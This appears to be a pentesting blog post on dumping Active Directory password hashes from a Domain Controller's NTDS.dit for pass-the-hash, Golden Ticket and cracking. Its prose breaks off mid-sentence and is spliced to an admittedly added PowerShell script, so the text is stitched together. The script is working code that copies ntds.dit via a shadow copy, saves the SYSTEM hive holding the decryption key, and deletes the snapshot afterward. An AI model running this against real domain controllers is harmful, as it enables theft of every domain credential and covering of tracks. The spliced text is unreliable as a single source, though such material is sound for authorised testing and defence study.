Extracting NTDS Users Data... The Fastest Way.
Extracting what?

One of the most tedious and time-consuming tasks a pentester faces when assessing a company's domain is the extraction of the NTDS.dit file, the Active Directory database stored on every Domain Controller (by default at %SystemRoot%\NTDS\ntds.dit). Retrieving the hashes of all domain users is, I think, the first thing a hacker should do after obtaining Domain Admin privileges. Getting hold of the LM/NTLM hashes is crucial: it opens up a long list of options for maintaining access after a successful exploitation (Golden Ticket, password cracking, pass-the-hash, etc.), and it looks beautiful when documented in a pentesting report ;)

Common ways to dump hashes

There are at least three well-known ways of extracting the LM/NTLM hashes from Active Directory: extracting the NTDS.dit file from a shadow copy created with vssadmin, dumping the datatable and link_table tables with esedbexport from the libesedb project, and retrieving the users data using scripts o

Whichever method is chosen, the SYSTEM registry hive has to be retrieved together with the database: the hashes inside NTDS.dit are encrypted with a key (the PEK) that is itself protected by the boot key stored in that hive, so without it the database cannot be decrypted.
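The first of the three methods, the shadow copy, as an added PowerShell example (this is not code from the original post). It assumes it is run from an elevated prompt on a Domain Controller whose database sits at the default C:\Windows\NTDS\ntds.dit, and it writes to C:\temp, a hypothetical output folder; the shadow copy ID and device path are parsed from vssadmin's own output rather than hard-coded.

```powershell
# Added example, not from the original post: copy ntds.dit and the SYSTEM hive
# out of a Volume Shadow Copy so the locked live database does not have to be read.
# Assumptions: elevated session on a DC, database at the default path on C:,
# output folder C:\temp (hypothetical).

$OutDir = 'C:\temp'
New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

# 1. Snapshot the C: volume. vssadmin prints both the shadow copy ID and the
#    \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN device path; capture both.
$vssOut = & vssadmin.exe create shadow /for=C:
$devMatch = ($vssOut | Select-String 'Shadow Copy Volume Name:\s*(\S+)').Matches
$idMatch  = ($vssOut | Select-String 'Shadow Copy ID:\s*(\{[0-9A-Fa-f-]+\})').Matches
if (-not $devMatch -or -not $idMatch) {
    throw "vssadmin did not return a shadow copy:`n$($vssOut -join "`n")"
}
$ShadowDev = $devMatch[0].Groups[1].Value
$ShadowId  = $idMatch[0].Groups[1].Value

# 2. Copy the database from the frozen snapshot. cmd's copy understands the
#    GLOBALROOT device path, which Copy-Item does not handle reliably.
& cmd.exe /c "copy `"$ShadowDev\Windows\NTDS\ntds.dit`" `"$OutDir\ntds.dit`""
if ($LASTEXITCODE -ne 0) { throw "copy of ntds.dit from $ShadowDev failed" }

# 3. Save the SYSTEM hive: it holds the boot key that protects the PEK, and
#    without it the hashes in ntds.dit cannot be decrypted offline.
& reg.exe save HKLM\SYSTEM "$OutDir\SYSTEM" /y
if ($LASTEXITCODE -ne 0) { throw "reg save of the SYSTEM hive failed" }

# 4. Remove the snapshot so it does not linger on the DC after the engagement.
& vssadmin.exe delete shadows /Shadow=$ShadowId /quiet

Get-ChildItem $OutDir
```

The two files in C:\temp are the input for the offline steps: ntds.dit can be fed to esedbexport to dump the datatable and link_table tables, and SYSTEM supplies the boot key for the decryption. Copying from the snapshot rather than the live volume is what makes this work, since the ESE engine keeps ntds.dit open with an exclusive lock while the directory service is running.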